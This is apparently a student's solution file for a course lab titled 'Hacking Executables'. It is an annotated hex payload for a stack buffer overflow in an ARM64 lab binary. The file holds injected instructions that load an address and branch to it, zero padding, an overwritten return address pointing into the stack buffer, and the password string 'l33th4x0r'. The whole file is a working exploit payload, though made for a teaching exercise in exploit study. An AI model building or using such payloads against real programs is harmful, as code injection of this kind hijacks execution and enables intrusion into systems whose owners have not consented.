computing-systems-212 / Lab 3: Hacking Executables / task4 / task4.hex
task4.hex
Raw
00 05 80 D2 82 DA 80 D2 // stores pwn3 address
02 08 A0 F2 01 7D 81 D2 // address of 'l33th4x0r'
01 FE BF F2 E1 FF DF F2 // and mov x1, #0xbe8 which is immed after 0000000000400be4 g     F .text	000000000000003c pwn1
40 00 1f d6 00 00 00 00 // br x2
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
40 e9 f0 ff ff ff 00 00 // address to start of buffer 0xfffffff0e940:	0x0000000000000000
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
6c 33 33 74 68 34 78 30 // string 'l33th4xor' in hex
72 00 00 00 00 00 00 00